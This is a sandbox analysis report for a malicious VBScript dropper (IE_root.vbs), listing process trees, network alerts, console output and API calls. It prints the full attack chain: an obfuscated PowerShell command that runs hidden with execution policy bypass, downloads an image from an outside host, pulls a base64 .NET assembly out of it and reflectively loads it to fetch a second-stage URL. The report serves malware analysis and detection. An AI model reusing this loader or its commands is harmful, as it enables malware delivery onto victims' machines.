Summary | ZeroBOX

IE_root.vbs

Generic Malware Antivirus Hide_URL PowerShell
Category Machine Started Completed
FILE s1_win7_x6401 Aug. 25, 2023, 9:04 a.m. Aug. 25, 2023, 9:06 a.m.
Size 254.8KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5 a28f130308c18357e5d78caa5483e81e
SHA256 35ec92cb8a440fd6cf53e1c2d47f70b3198d1c49b30dd956a4a0ee115cf1d25e
CRC32 A03BB58D
ssdeep 3072:b8+mXwgMKPOyOBMdxdAsWOSdhPdMsG8TTUTeToTM66hs+:b8+mXwgMt66j
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\IE_root.vbs

    2624
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵VQBy⁂⇵Gw⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵JwBo⁂⇵HQ⁂⇵d⁂⇵Bw⁂⇵HM⁂⇵Og⁂⇵v⁂⇵C8⁂⇵dQBw⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵Z⁂⇵Bl⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBu⁂⇵HM⁂⇵LgBj⁂⇵G8⁂⇵bQ⁂⇵u⁂⇵GI⁂⇵cg⁂⇵v⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBz⁂⇵C8⁂⇵M⁂⇵⁂⇵w⁂⇵DQ⁂⇵Lw⁂⇵1⁂⇵DU⁂⇵OQ⁂⇵v⁂⇵DU⁂⇵MQ⁂⇵w⁂⇵C8⁂⇵bwBy⁂⇵Gk⁂⇵ZwBp⁂⇵G4⁂⇵YQBs⁂⇵C8⁂⇵cgB1⁂⇵G0⁂⇵c⁂⇵Bf⁂⇵H⁂⇵⁂⇵cgBp⁂⇵HY⁂⇵YQB0⁂⇵GU⁂⇵LgBq⁂⇵H⁂⇵⁂⇵Zw⁂⇵/⁂⇵DE⁂⇵Ng⁂⇵5⁂⇵D⁂⇵⁂⇵NQ⁂⇵w⁂⇵DQ⁂⇵MQ⁂⇵y⁂⇵Dk⁂⇵Jw⁂⇵7⁂⇵CQ⁂⇵dwBl⁂⇵GI⁂⇵QwBs⁂⇵Gk⁂⇵ZQBu⁂⇵HQ⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵TgBl⁂⇵Hc⁂⇵LQBP⁂⇵GI⁂⇵agBl⁂⇵GM⁂⇵d⁂⇵⁂⇵g⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵TgBl⁂⇵HQ⁂⇵LgBX⁂⇵GU⁂⇵YgBD⁂⇵Gw⁂⇵aQBl⁂⇵G4⁂⇵d⁂⇵⁂⇵7⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵k⁂⇵Hc⁂⇵ZQBi⁂⇵EM⁂⇵b⁂⇵Bp⁂⇵GU⁂⇵bgB0⁂⇵C4⁂⇵R⁂⇵Bv⁂⇵Hc⁂⇵bgBs⁂⇵G8⁂⇵YQBk⁂⇵EQ⁂⇵YQB0⁂⇵GE⁂⇵K⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBV⁂⇵HI⁂⇵b⁂⇵⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵u⁂⇵EU⁂⇵bgBj⁂⇵G8⁂⇵Z⁂⇵Bp⁂⇵G4⁂⇵ZwBd⁂⇵Do⁂⇵OgBV⁂⇵FQ⁂⇵Rg⁂⇵4⁂⇵C4⁂⇵RwBl⁂⇵HQ⁂⇵UwB0⁂⇵HI⁂⇵aQBu⁂⇵Gc⁂⇵K⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBC⁂⇵Hk⁂⇵d⁂⇵Bl⁂⇵HM⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵Jw⁂⇵8⁂⇵Dw⁂⇵QgBB⁂⇵FM⁂⇵RQ⁂⇵2⁂⇵DQ⁂⇵XwBT⁂⇵FQ⁂⇵QQBS⁂⇵FQ⁂⇵Pg⁂⇵+⁂⇵Cc⁂⇵Ow⁂⇵k⁂⇵GU⁂⇵bgBk⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵Jw⁂⇵8⁂⇵Dw⁂⇵QgBB⁂⇵FM⁂⇵RQ⁂⇵2⁂⇵DQ⁂⇵XwBF⁂⇵E4⁂⇵R⁂⇵⁂⇵+⁂⇵D4⁂⇵Jw⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBU⁂⇵GU⁂⇵e⁂⇵B0⁂⇵C4⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵E8⁂⇵Zg⁂⇵o⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵ZQBu⁂⇵GQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FQ⁂⇵ZQB4⁂⇵HQ⁂⇵LgBJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵TwBm⁂⇵Cg⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BG⁂⇵Gw⁂⇵YQBn⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵HM⁂⇵d⁂⇵Bh⁂⇵HI⁂⇵d⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵Gc⁂⇵ZQ⁂⇵g⁂⇵D⁂⇵⁂⇵I⁂⇵⁂⇵t⁂⇵GE⁂⇵bgBk⁂⇵C⁂⇵⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵Gc⁂⇵d⁂⇵⁂⇵g⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵Cs⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵LgBM⁂⇵GU⁂⇵bgBn⁂⇵HQ⁂⇵a⁂⇵⁂⇵7⁂⇵CQ⁂⇵YgBh⁂⇵HM⁂⇵ZQ⁂⇵2⁂⇵DQ⁂⇵T⁂⇵Bl⁂⇵G4⁂⇵ZwB0⁂⇵Gg⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵t⁂⇵C⁂⇵⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵Ds⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BD⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FQ⁂⇵ZQB4⁂⇵HQ⁂⇵LgBT⁂⇵HU⁂⇵YgBz⁂⇵HQ⁂⇵cgBp⁂⇵G4⁂⇵Zw⁂⇵o⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵s⁂⇵C⁂⇵⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BM⁂⇵GU⁂⇵bgBn⁂⇵HQ⁂⇵a⁂⇵⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bj⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵QwBv⁂⇵G4⁂⇵dgBl⁂⇵HI⁂⇵d⁂⇵Bd⁂⇵Do⁂⇵OgBG⁂⇵HI⁂⇵bwBt⁂⇵EI⁂⇵YQBz⁂⇵GU⁂⇵Ng⁂⇵0⁂⇵FM⁂⇵d⁂⇵By⁂⇵Gk⁂⇵bgBn⁂⇵Cg⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BD⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵ZQBk⁂⇵EE⁂⇵cwBz⁂⇵GU⁂⇵bQBi⁂⇵Gw⁂⇵eQ⁂⇵g⁂⇵D0⁂⇵I⁂⇵Bb⁂⇵FM⁂⇵eQBz⁂⇵HQ⁂⇵ZQBt⁂⇵C4⁂⇵UgBl⁂⇵GY⁂⇵b⁂⇵Bl⁂⇵GM⁂⇵d⁂⇵Bp⁂⇵G8⁂⇵bg⁂⇵u⁂⇵EE⁂⇵cwBz⁂⇵GU⁂⇵bQBi⁂⇵Gw⁂⇵eQBd⁂⇵Do⁂⇵OgBM⁂⇵G8⁂⇵YQBk⁂⇵Cg⁂⇵J⁂⇵Bj⁂⇵G8⁂⇵bQBt⁂⇵GE⁂⇵bgBk⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵p⁂⇵Ds⁂⇵J⁂⇵B0⁂⇵Hk⁂⇵c⁂⇵Bl⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵b⁂⇵Bv⁂⇵GE⁂⇵Z⁂⇵Bl⁂⇵GQ⁂⇵QQBz⁂⇵HM⁂⇵ZQBt⁂⇵GI⁂⇵b⁂⇵B5⁂⇵C4⁂⇵RwBl⁂⇵HQ⁂⇵V⁂⇵B5⁂⇵H⁂⇵⁂⇵ZQ⁂⇵o⁂⇵Cc⁂⇵RgBp⁂⇵GI⁂⇵ZQBy⁂⇵C4⁂⇵S⁂⇵Bv⁂⇵G0⁂⇵ZQ⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵G0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵d⁂⇵B5⁂⇵H⁂⇵⁂⇵ZQ⁂⇵u⁂⇵Ec⁂⇵ZQB0⁂⇵E0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵Cg⁂⇵JwBW⁂⇵EE⁂⇵SQ⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵GE⁂⇵cgBn⁂⇵HU⁂⇵bQBl⁂⇵G4⁂⇵d⁂⇵Bz⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵Cw⁂⇵K⁂⇵⁂⇵n⁂⇵HQ⁂⇵e⁂⇵B0⁂⇵C4⁂⇵S⁂⇵BC⁂⇵C8⁂⇵QQBU⁂⇵FM⁂⇵V⁂⇵⁂⇵v⁂⇵DQ⁂⇵Lg⁂⇵1⁂⇵Dc⁂⇵MQ⁂⇵u⁂⇵D⁂⇵⁂⇵MQ⁂⇵y⁂⇵C4⁂⇵Mg⁂⇵5⁂⇵DE⁂⇵Lw⁂⇵v⁂⇵Do⁂⇵c⁂⇵B0⁂⇵HQ⁂⇵a⁂⇵⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵G0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵C4⁂⇵SQBu⁂⇵HY⁂⇵bwBr⁂⇵GU⁂⇵K⁂⇵⁂⇵k⁂⇵G4⁂⇵dQBs⁂⇵Gw⁂⇵L⁂⇵⁂⇵g⁂⇵CQ⁂⇵YQBy⁂⇵Gc⁂⇵dQBt⁂⇵GU⁂⇵bgB0⁂⇵HM⁂⇵KQ⁂⇵=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂⇵','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD

      2736
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/559/510/original/rump_private.jpg?1690504129';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.HB/ATST/4.571.012.291//:ptth');$method.Invoke($null, $arguments)"

        2848

IP Address Status Action
121.254.136.9 Active Moloch
164.124.101.2 Active Moloch
172.67.215.45 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49165 -> 172.67.215.45:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49165
172.67.215.45:443
C=US, O=Let's Encrypt, CN=E1 CN=uploaddeimagens.com.br 67:68:c4:e4:aa:54:e1:fd:f0:50:01:73:1e:da:cf:48:0c:17:0d:34

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: on was closed: Could not establish trust relationship for the SSL/TLS secure ch
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: annel."
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: At line:1 char:184
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/559/510/original/rump_
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: private.jpg?1690504129';$webClient = New-Object System.Net.WebClient;$imageByte
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: s = $webClient.DownloadData <<<< ($imageUrl);$imageText = [System.Text.Encoding
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: ]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BA
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: SE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: .IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command =
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Conver
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: t]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assem
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: bly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: = $type.GetMethod('VAI');$arguments = ,('txt.HB/ATST/4.571.012.291//:ptth');$m
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: ethod.Invoke($null, $arguments)
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null.
console_handle: 0x0000010f
1 1 0

WriteConsoleW

buffer: Parameter name: bytes"
console_handle: 0x0000011b
1 1 0

WriteConsoleW

buffer: At line:1 char:247
console_handle: 0x00000127
1 1 0

WriteConsoleW

buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/559/510/original/rump_
console_handle: 0x00000133
1 1 0

WriteConsoleW

buffer: private.jpg?1690504129';$webClient = New-Object System.Net.WebClient;$imageByte
console_handle: 0x0000013f
1 1 0

WriteConsoleW

buffer: s = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF
console_handle: 0x0000014b
1 1 0

WriteConsoleW

buffer: 8.GetString <<<< ($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BA
console_handle: 0x00000157
1 1 0

WriteConsoleW

buffer: SE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText
console_handle: 0x00000163
1 1 0

WriteConsoleW

buffer: .IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex
console_handle: 0x0000016f
1 1 0

WriteConsoleW

buffer: += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command =
console_handle: 0x0000017b
1 1 0

WriteConsoleW

buffer: $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Conver
console_handle: 0x00000187
1 1 0

WriteConsoleW

buffer: t]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assem
console_handle: 0x00000193
1 1 0

WriteConsoleW

buffer: bly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method
console_handle: 0x0000019f
1 1 0

WriteConsoleW

buffer: = $type.GetMethod('VAI');$arguments = ,('txt.HB/ATST/4.571.012.291//:ptth');$m
console_handle: 0x000001ab
1 1 0

WriteConsoleW

buffer: ethod.Invoke($null, $arguments)
console_handle: 0x000001b7
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000001c3
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000001cf
1 1 0

WriteConsoleW

buffer: You cannot call a method on a null-valued expression.
console_handle: 0x000001ef
1 1 0

WriteConsoleW

buffer: At line:1 char:353
console_handle: 0x000001fb
1 1 0

WriteConsoleW

buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/559/510/original/rump_
console_handle: 0x00000207
1 1 0

WriteConsoleW

buffer: private.jpg?1690504129';$webClient = New-Object System.Net.WebClient;$imageByte
console_handle: 0x00000213
1 1 0

WriteConsoleW

buffer: s = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF
console_handle: 0x0000021f
1 1 0

WriteConsoleW

buffer: 8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_E
console_handle: 0x0000022b
1 1 0

WriteConsoleW

buffer: ND>>';$startIndex = $imageText.IndexOf <<<< ($startFlag);$endIndex = $imageText
console_handle: 0x00000237
1 1 0

WriteConsoleW

buffer: .IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex
console_handle: 0x00000243
1 1 0

WriteConsoleW

buffer: += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command =
console_handle: 0x0000024f
1 1 0

WriteConsoleW

buffer: $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Conver
console_handle: 0x0000025b
1 1 0

WriteConsoleW

buffer: t]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assem
console_handle: 0x00000267
1 1 0

WriteConsoleW

buffer: bly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method
console_handle: 0x00000273
1 1 0

WriteConsoleW

buffer: = $type.GetMethod('VAI');$arguments = ,('txt.HB/ATST/4.571.012.291//:ptth');$m
console_handle: 0x0000027f
1 1 0

WriteConsoleW

buffer: ethod.Invoke($null, $arguments)
console_handle: 0x0000028b
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (IndexOf:String) [], RuntimeEx
console_handle: 0x00000297
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c1cb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c2278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c2278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c2278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c25b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c25b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c25b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c25b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c25b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c25b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c2138
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c2138
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c2138
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c2278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c2278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c2278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c1d78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c2278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c2278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c2278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c2278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c2278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c2278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c2278
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c1938
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c1938
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c1938
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c1938
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c1938
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c1938
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c1938
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c1938
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c1938
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c1938
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c1938
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c1938
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c1938
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c1938
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c1e38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006c1e38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0031d950
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0031e050
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0031e050
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0031e050
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0031e310
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0031e310
flags: 0
